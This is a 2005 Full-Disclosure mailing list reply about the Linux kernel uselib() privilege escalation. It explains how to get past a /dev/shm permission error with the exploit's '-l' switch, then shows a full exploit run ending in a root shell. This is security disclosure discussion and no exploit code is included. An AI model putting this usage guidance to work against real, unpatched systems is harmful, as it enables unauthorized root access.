Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected
- To: Frank Dietrich <bits_n_bytes@xxxxxx>
- Subject: Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected
- From: Karol Wiesek <appelast@xxxxxxxxxxxxxxxx>
- Date: Sat, 8 Jan 2005 12:21:15 +0100
On Sat, Jan 08, 2005 at 11:38:34AM +0100, Frank Dietrich wrote:
=> Hi there,
=>
=> Paul Starzetz <ihaquer@xxxxxxx> wrote:
=> > Synopsis: Linux kernel uselib() privilege elevation
=> > Product: Linux kernel
=> > Version: 2.4 up to and including 2.4.29-rc2, 2.6 up to and
=>
=> Is the system always compromisable without tmpfs support in the
=> kernel?
=>
=> I tried your exploit sample to test my systems. As a normal user I get
=> "can't write to /dev/shm". /dev/shm here is only writable by root.
=>
Use the -l switch to specify the location of the lib.
[appelast@nesquik appelast]$ ./ex -l ./lib
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 65527
child 3 VMAs 33067
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf75c000
Wait... -
[+] race won maps=10888
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc8a66000
[+] gate modified ( 0xffec90fc 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b#